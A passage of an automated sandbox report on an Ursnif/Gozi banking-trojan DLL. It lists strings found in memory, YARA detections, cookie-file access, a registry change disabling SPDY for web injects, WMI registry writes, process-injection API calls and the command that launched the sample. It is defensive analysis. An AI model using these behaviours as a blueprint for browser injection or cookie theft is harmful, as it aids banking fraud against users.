Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4672, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_004531EC
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	0_2_004531EC
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_004531EC

Yara detected Ursnif

Source: Yara match	File source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4672, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\System32\loaddll32.exe

Memory allocated: 73750000 page execute and read and write

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73751CEF GetProcAddress,NtCreateSection,memset,	0_2_73751CEF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_737515AB GetLastError,NtClose,	0_2_737515AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73751880 NtMapViewOfSection,	0_2_73751880
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_737524C5 NtQueryVirtualMemory,	0_2_737524C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	0_2_0044B868
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00461813 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00461813
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00446825 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	0_2_00446825
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00453A77 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00453A77
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0045620F GetProcAddress,NtCreateSection,memset,	0_2_0045620F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0045A3DE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_0045A3DE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0046345F NtMapViewOfSection,	0_2_0046345F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00462557 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	0_2_00462557
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00441D18 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	0_2_00441D18
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044C536 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	0_2_0044C536
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0045865A NtQueryInformationProcess,	0_2_0045865A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044976D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	0_2_0044976D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00450084 memset,NtQueryInformationProcess,	0_2_00450084
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00465A8E NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	0_2_00465A8E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0045AAB7 NtGetContextThread,RtlNtStatusToDosError,	0_2_0045AAB7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00444C96 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	0_2_00444C96
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00457511 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_00457511
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00442D26 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00442D26
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00448DAA NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	0_2_00448DAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00446F11 NtQuerySystemInformation,RtlNtStatusToDosError,	0_2_00446F11
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB387C NtCreateSection,	35_2_00FB387C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB3830 NtWriteVirtualMemory,	35_2_00FB3830
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB1AC4 NtQueryInformationProcess,	35_2_00FB1AC4
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FABAB4 NtAllocateVirtualMemory,	35_2_00FABAB4
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FACCA0 NtReadVirtualMemory,	35_2_00FACCA0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCADD4 NtQueryInformationProcess,	35_2_00FCADD4
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FBF560 NtSetInformationProcess,CreateRemoteThread,TerminateThread,	35_2_00FBF560
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_00FCF7EC
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FBFFCC NtMapViewOfSection,	35_2_00FBFFCC
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC676C NtSetContextThread,NtUnmapViewOfSection,NtClose,	35_2_00FC676C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_00FE1002

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00432161	0_3_00432161
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00431AE4	0_3_00431AE4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_737522A4	0_2_737522A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0047181A	0_2_0047181A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0045F9C9	0_2_0045F9C9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_004491D8	0_2_004491D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044A235	0_2_0044A235
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_004562B9	0_2_004562B9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00447CF0	0_2_00447CF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00451481	0_2_00451481
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0045C53B	0_2_0045C53B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0045BDD5	0_2_0045BDD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044DE6E	0_2_0044DE6E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00459F48	0_2_00459F48
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00466F28	0_2_00466F28
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCC164	35_2_00FCC164
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCA4BC	35_2_00FCA4BC
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC676C	35_2_00FC676C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC20F8	35_2_00FC20F8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCE080	35_2_00FCE080
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC6064	35_2_00FC6064
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FBB040	35_2_00FBB040
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA203C	35_2_00FA203C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC0034	35_2_00FC0034
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC91A0	35_2_00FC91A0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB1174	35_2_00FB1174
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCF940	35_2_00FCF940
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB9138	35_2_00FB9138
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FAC134	35_2_00FAC134
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC8224	35_2_00FC8224
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC3208	35_2_00FC3208
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA2BC8	35_2_00FA2BC8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB9380	35_2_00FB9380
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA8B5C	35_2_00FA8B5C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB8B4C	35_2_00FB8B4C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA7320	35_2_00FA7320
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FABCF8	35_2_00FABCF8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB3CE0	35_2_00FB3CE0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC74CC	35_2_00FC74CC
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB0CC0	35_2_00FB0CC0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC94B8	35_2_00FC94B8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB9CB0	35_2_00FB9CB0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FBD4A8	35_2_00FBD4A8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FAD460	35_2_00FAD460
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB1D94	35_2_00FB1D94
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB452C	35_2_00FB452C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FBB520	35_2_00FBB520
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCB516	35_2_00FCB516
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA6D08	35_2_00FA6D08
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FC26B4	35_2_00FC26B4
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCBEB0	35_2_00FCBEB0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FAAE04	35_2_00FAAE04
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA37B8	35_2_00FA37B8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FB17B8	35_2_00FB17B8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FCAFB8	35_2_00FCAFB8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FA9F98	35_2_00FA9F98
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FBF770	35_2_00FBF770
Source: C:\Windows\System32\control.exe	Code function: 35_2_00FAB75C	35_2_00FAB75C

Source: jery0dbp.dll.31.dr	Static PE information: No import functions for PE file found
Source: 1453igkk.dll.29.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D2ACCE85-0966-D4B7-2326-4D4807BAD1FC}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C659AAB4-6D66-E894-275A-F19C4B2EB590}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{AABE5E0C-015E-6C1F-DB7E-C5603F92C994}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
